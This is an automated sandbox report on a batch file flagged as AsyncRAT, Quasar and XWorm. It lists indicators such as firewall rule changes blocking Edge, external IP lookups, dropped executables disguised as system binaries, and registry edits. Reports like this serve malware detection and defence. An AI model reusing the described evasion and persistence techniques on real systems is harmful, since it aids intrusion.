Malware Analysis Report

2024-10-23 19:04

Sample ID 240629-yyk9fsveja
Target Output.bat
SHA256 3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036
Tags
asyncrat quasar xworm default evasion execution persistence privilege_escalation rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036

Threat Level: Known bad

The file Output.bat was found to be: Known bad.

Malicious Activity Summary

asyncrat quasar xworm default evasion execution persistence privilege_escalation rat spyware trojan

Modifies security service

Detect Xworm Payload

Modifies firewall policy service

Quasar RAT

Quasar payload

Xworm

AsyncRat

Async RAT payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks computer location settings

Looks up external IP address via web service

Enumerates connected drives

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: LoadsDriver

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-29 20:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-29 20:11

Reported

2024-06-29 20:29

Platform

win10v2004-20240508-en

Max time kernel

1049s

Max time network

1048s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{1A280F62-479D-4C75-BCF5-F49586D9CB43} = "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{46180BB6-C69C-4461-B788-35D602E3D2C8} = "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" C:\Windows\system32\svchost.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\PolicyVersion = "542" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|D=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\|PFN=Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe|" C:\Windows\system32\svchost.exe N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\wdi\LogFiles\StartupInfo\S-1-5-21-1337824034-2731376981-3755436523-1000_StartupInfo3.xml C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\SRU\SRU.log C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\SRU\SRUDB.jfm C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl C:\Windows\System32\svchost.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\SRU\SRUDB.dat C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\WDI\BootPerformanceDiagnostics_SystemData.bin C:\Windows\System32\svchost.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\SRU\SRU.chk C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\WDI\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-1337824034-2731376981-3755436523-1000_UserData.bin C:\Windows\System32\svchost.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Networking%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\INF\netsstpa.PNF C:\Windows\Explorer.EXE N/A
File created C:\Windows\INF\netrasa.PNF C:\Windows\Explorer.EXE N/A
File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk C:\Windows\System32\svchost.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\svchost.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\svchost.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\Explorer.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = 82079ef260cada01 C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\RAS AutoDial C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\RAS AutoDial\Default C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = cc2ee48762cada01 C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecision = "0" C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = caabb54d61cada01 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61 C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionReason = "1" C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133641655111398851" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655992145014" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655787268193" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ICT = "133641655754612850" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655800705768" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655955094805" C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m = f401000040010000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1 C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655285734553" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655790549625" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655800862074" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655989134936" C:\Windows\system32\svchost.exe N/A
